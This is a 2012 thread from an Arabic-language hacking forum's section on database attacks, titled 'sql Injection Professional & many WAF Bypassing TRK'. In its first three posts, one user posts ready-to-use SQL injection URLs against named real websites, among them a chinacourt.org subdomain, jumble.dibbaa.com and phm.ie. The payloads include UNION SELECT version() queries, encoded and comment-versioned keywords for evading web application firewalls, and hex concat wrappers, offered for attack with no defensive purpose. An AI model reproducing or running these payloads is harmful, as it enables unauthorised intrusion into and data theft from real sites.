يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات
تحديث الصفحة sql Injection Professional & many WAF Bypassing TRK
التسجيل التعليمات التقويم البحث مشاركات اليوم

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-22-2012, 01:11 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية CODE3
 

 
 
إحصائية العضو





CODE3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODE3 is on a distinguished road
. sql Injection Professional & many WAF Bypassing TRK

بعض المشاكل في الحقن وكيف تخطيها

:: like ::
كود PHP:
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ version() --+ 


open source page : press Ctrl+f and typ 5.0

and to avoid Source Code Injection and appear info inside img in mean page

use
اقتباس
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

or
اقتباس
concat(0x273e27,version(),0x3c212d2d)



كود PHP:
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+ 





sql Injection Professional & many WAF Bypassing TRK

التوقيع

 

   

رد مع اقتباس
قديم 07-22-2012, 01:18 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية CODE3
 

 
 
إحصائية العضو





CODE3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODE3 is on a distinguished road
افتراضي رد: sql Injection Professional & many WAF Bypassing TRK


(2)
كود PHP:
jumble.dibbaa.com/article.php?id=7' union select 1,2,3,4,5,6,7,8 +--+ 
\

no column appear in page i will use div+0 i will put it befor union select

or use one of this

اقتباس
div+0
Having+1=0
AND+1=0
/*!and*/+1=0
and(1)=(0) x

OR false the url query

id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select

كود PHP:
jumble.dibbaa.com/article.php?id=7' div 0 union select 1,2,3,4,5,6,7,8 +--+ 




التوقيع

 

   

رد مع اقتباس
قديم 07-22-2012, 01:26 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية CODE3
 

 
 
إحصائية العضو





CODE3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODE3 is on a distinguished road
افتراضي رد: sql Injection Professional & many WAF Bypassing TRK

كود PHP:
http://www.phm.ie/project.php?cat=Conservation 
u can use many method to bypassing Forbidden

like

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/

كود PHP:
http://www.phm.ie/project.php?cat=Conservation' +and(1)=(0) +union+distinct+select+ 1,version(),3,4,5,6,7,8,9,10-- - 
and use and 1=0 to apear column nmb in the page

or

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
التوقيع

 

التعديل الأخير تم بواسطة CODE3 ; 07-22-2012 الساعة 01:33 PM.

   

رد مع اقتباس
قديم 07-22-2012, 01:49 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية ABO-SAGER
 

 
 
إحصائية العضو





ABO-SAGER غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ABO-SAGER is on a distinguished road
افتراضي رد: sql Injection Professional & many WAF Bypassing TRK

شكراً لك بس انا وضعت شرح كيف تتخطى الحقن في السورس

التوقيع

ABO-SAGER

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »
أدوات الموضوع
انواع عرض الموضوع
العرض العادي العرض العادي

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 10:34 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0